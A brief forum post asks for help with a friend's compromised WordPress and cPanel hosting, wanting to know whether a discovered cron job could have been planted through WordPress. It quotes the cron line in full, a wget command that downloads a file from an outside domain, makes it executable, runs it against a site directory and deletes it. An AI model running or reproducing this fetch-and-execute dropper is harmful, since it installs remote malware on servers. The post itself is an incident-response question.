Infected WP and maybe cPanel as well
As usual, no one cares until the excrement hits the air-current amplifier.
- Unreliable provider - check
- Several sites on one cPanel - check
- WordPress without updates and any hardening - check
And yes, it's a friend I can't say no to.
Now, my first (and only so far) question is:
Can this cron job be added to cPanel through WordPress, or does it mean the whole cPanel account has been compromised (if that can be answered just from this info)?
wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd
Mostly WordPress ™